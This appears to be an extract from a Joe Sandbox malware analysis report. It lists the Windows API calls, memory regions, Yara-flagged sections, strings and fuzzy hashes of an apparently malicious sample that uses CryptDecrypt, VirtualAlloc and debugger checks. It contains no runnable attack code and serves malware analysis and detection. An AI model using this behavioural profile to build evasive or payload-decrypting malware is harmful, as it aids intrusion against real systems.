                                                  • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                                  • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                  • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                                  APIs
                                                  • _free.LIBCMT ref: 10005C07
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                  • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00DAA16E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DA9000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da9000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 43d50efa79434ada3ec36ce39fa49bfe189bff492070d7ded440eadf758d3750
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: 57112B79A00208EFDB01DF98C985E98BBF5EF08350F058094F9489B362D371EA50DF91
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                  • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                                  • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                  • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                                  APIs
                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                  • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                                  • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                  • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
                                                  • API String ID: 0-735762442
                                                  • Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                  • Instruction ID: d1863f09282db01cbe0ff39ae2376dbc37c2793cc856e5adc78d2d40b937d76c
                                                  • Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                  • Instruction Fuzzy Hash: C7E2CCB1D002589BDF24EB64CC55BEDBBB4AF11304F1091E8E5193B292EB755E88CFA1
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 00E937A7
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00E937CB
                                                  • _mbstowcs.LIBCMT ref: 00E9381E
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 00E93835
                                                  • GetLastError.KERNEL32 ref: 00E9383F
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00E93867
                                                  • GetLastError.KERNEL32 ref: 00E93871
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E93881
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 00E93943
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 00E939B5
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E93783
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 3642901890-63410773
                                                  • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                  • Instruction ID: 3452a092e556f1c4f6ccd2307f260534ba018518fa67281792fd7d46d7c7c72e
                                                  • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                  • Instruction Fuzzy Hash: 5B819E71A00218AFEF249F24CC45B9ABBB6FF89304F1481A9F54DE7291DB719E848F51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: '^zi$0+t?$2__$4s^$8~{$Q4]~$~?}$lXg$zW
                                                  • API String ID: 0-100829803
                                                  • Opcode ID: fb7ffd4ca24e343ab64b6082d29e30b772fb6729577879d6899b1c3df115e5f0
                                                  • Instruction ID: 94f60cd853afc27696a7966e3d3a03b4bd0bcdd3447823f0e400c39ff9d168a0
                                                  • Opcode Fuzzy Hash: fb7ffd4ca24e343ab64b6082d29e30b772fb6729577879d6899b1c3df115e5f0
                                                  • Instruction Fuzzy Hash: 3DB24BF360C2049FE304AE2DEC8567AF7E9EF94720F16863DE6C5C7744EA3598018696
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                  • Instruction ID: d7ffb76180c9728a397d1ccf0e686cee7d0516322be8d88619d78ced8c4d9a03
                                                  • Opcode Fuzzy Hash: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                  • Instruction Fuzzy Hash: F1C22A72E042288FDB25CE28DD507EAB3B5EB49314F1441ABD84DE7280E779AEC58F45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "Mk}$*p^}$0mw$RHy$b#_$k6W
                                                  • API String ID: 0-91852522
                                                  • Opcode ID: dbb8559a49791cf60e391eea520ab7c998fb8d6b0e976bb39c991125ca78eb47
                                                  • Instruction ID: 2b7d37b26d7dcc2bc5a991f1b002fb6cd5f2ab6afd87c60e4828fbff17cac669
                                                  • Opcode Fuzzy Hash: dbb8559a49791cf60e391eea520ab7c998fb8d6b0e976bb39c991125ca78eb47
                                                  • Instruction Fuzzy Hash: D2B217F360C2149FE3186E2DEC4567ABBE9EFD4720F1A493DEAC5C3344EA3558018696
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5xO}$5w,$o5-$ox?V$pL+$}+%
                                                  • API String ID: 0-4273804182
                                                  • Opcode ID: fc37c7d36d54af61c5400a31bb3dfa6b313519c3566e3e9a0693f47d7c6c4d5f
                                                  • Instruction ID: 634229da632cbd8d7710c1d1690e5316186c16d0a374b974963fda193797ab75
                                                  • Opcode Fuzzy Hash: fc37c7d36d54af61c5400a31bb3dfa6b313519c3566e3e9a0693f47d7c6c4d5f
                                                  • Instruction Fuzzy Hash: 91B2E6F360C6009FE304AE29EC8577ABBE5EF94720F1A893DE6C4C7744E63598058697
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                                  • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                                  • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E99A25
                                                  • IsDebuggerPresent.KERNEL32 ref: 00E99AF1
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E99B11
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00E99B1B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction ID: 86bb0408f35eb59dad6398aea974873926d39d3cc26e969f03e35c2c8536436d
                                                  • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction Fuzzy Hash: 6931FBB5D0521C9BDF10DF64D98A7CCBBF8BF08304F1041AAE409AB250EB755A85CF45
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                  • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                  • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                  • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                  • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ${E{$2scj$NQR+
                                                  • API String ID: 0-1557650278
                                                  • Opcode ID: 34269b8d84c25f339fe8aa12371750012b62bb368d3a229aa1bff1bd441eba24
                                                  • Instruction ID: ac18ecc241f064977a3f8cd79db15260bbc38580d521e0e2c8d9aff29945ac9c
                                                  • Opcode Fuzzy Hash: 34269b8d84c25f339fe8aa12371750012b62bb368d3a229aa1bff1bd441eba24
                                                  • Instruction Fuzzy Hash: D0B25BF3A0C6049FE304AE2DEC8567BBBD9EBD4320F1A463DEAC5C3744E93558058696
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @[y$ZZ$qWo
                                                  • API String ID: 0-580805910
                                                  • Opcode ID: e18fe93c86dd0153b583c102a7d53e0d0055cb5f070b5fc3b77a1f9695c89461
                                                  • Instruction ID: 384587c0dbf66fa338303a060e6f7be04117d2031153a8d2b2174b512d27f503
                                                  • Opcode Fuzzy Hash: e18fe93c86dd0153b583c102a7d53e0d0055cb5f070b5fc3b77a1f9695c89461
                                                  • Instruction Fuzzy Hash: 18B2F6F3A082109FE304AE2DDC8566AFBE5EFD4720F1A853DE6C5C3744EA3558058697
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `*8$s=oc$sJ
                                                  • API String ID: 0-3388830950
                                                  • Opcode ID: 0dfc94e8ed56e96cf5a624b309a2c86ab723844e7fbb032d3ed394a51aef5691
                                                  • Instruction ID: 531c0828b46b8c01d0aea104d13413f5a23948ccb77b85c7c802f1c2da19d73c
                                                  • Opcode Fuzzy Hash: 0dfc94e8ed56e96cf5a624b309a2c86ab723844e7fbb032d3ed394a51aef5691
                                                  • Instruction Fuzzy Hash: EFB2E5F36082049FE3046E2DEC8577ABBE9EF94720F1A493DEAC5C3744EA3558448697
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )]$/Z3$cDzk
                                                  • API String ID: 0-1976457530
                                                  • Opcode ID: a69669357c36a94ad8956e7768cafa19df9ce3497208010cdfd24ce1ad9acc11
                                                  • Instruction ID: 55c866a588ad198b362b1f5d1a442cf827e932395bb5a0c283b02284dc857279
                                                  • Opcode Fuzzy Hash: a69669357c36a94ad8956e7768cafa19df9ce3497208010cdfd24ce1ad9acc11
                                                  • Instruction Fuzzy Hash: A8A24BF360C2109FE304AE2DEC8567ABBE5EFD4720F1A863DE6C4D3744EA3558058696
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                  • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                                  • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                  • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00E9C412
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E9C41C
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00E9C429
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                  • Instruction ID: 6780126a4ba03a93db9a014d08b1f6715943f48b859779444168ba88d26828ff
                                                  • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                  • Instruction Fuzzy Hash: A931B4749012289BCF21DF28D9897DCBBF4BF08314F6051EAE41CA7251E7709B858F49
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                  • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                                  • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                  • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00E9F173,00000000,0041D0A0,?,00000000,?,00EA1714), ref: 00E9F196
                                                  • TerminateProcess.KERNEL32(00000000,?,00E9F173,00000000,0041D0A0,?,00000000,?,00EA1714), ref: 00E9F19D
                                                  • ExitProcess.KERNEL32 ref: 00E9F1AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction ID: c64bfdc4ca6b76c57936d17e0f743b43cb82f0437c2a95b7cd715cb5c4598cfa
                                                  • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction Fuzzy Hash: 84E0B671445118FFCF117B65DD49A893B69FF54386F005424F805DA232CB7AED81CB84
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                  • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                  • ExitProcess.KERNEL32 ref: 10005F60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                  • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                  • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                  • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: VWo$chk?
                                                  • API String ID: 0-2573530756
                                                  • Opcode ID: 1b03a7c5bf72a8a561409a882463fad458ad629fb598abd167ed00a71510b94f
                                                  • Instruction ID: a7a73447458700940fa87ca74e43c99ccd040bbf67d5ae11c02df7863a257dd2
                                                  • Opcode Fuzzy Hash: 1b03a7c5bf72a8a561409a882463fad458ad629fb598abd167ed00a71510b94f
                                                  • Instruction Fuzzy Hash: 8AB2F4F3A0C2049FE304AE2DEC8567AFBE9EB94320F16493DEAC4C7744E67558058697
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Nf.z$a=Q#
                                                  • API String ID: 0-1229552487
                                                  • Opcode ID: 59944ea13e2b01c98e1cb7af4cb1de36c0c2c4a5c93ce68b857a1bf7f07d0f1d
                                                  • Instruction ID: 8c88c2b7f44531715ff3fa44185fc725f8295d39a90b91d30a97bb3f928c444f
                                                  • Opcode Fuzzy Hash: 59944ea13e2b01c98e1cb7af4cb1de36c0c2c4a5c93ce68b857a1bf7f07d0f1d
                                                  • Instruction Fuzzy Hash: 13A2E7F360C2009FE304AE2DEC8567AFBE5EF94720F16892DEAC4C7744E63598158697
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 5436af83c9de25b7c83b2b0744a6dbdd5f825dced8fe0b4cd54ed4de2ff3ca3c
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: 0E3139B6900609DFDB11CF99C880AEEBBF5FF88328F65504AD841B7211D771EA45CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                  • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                                  • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
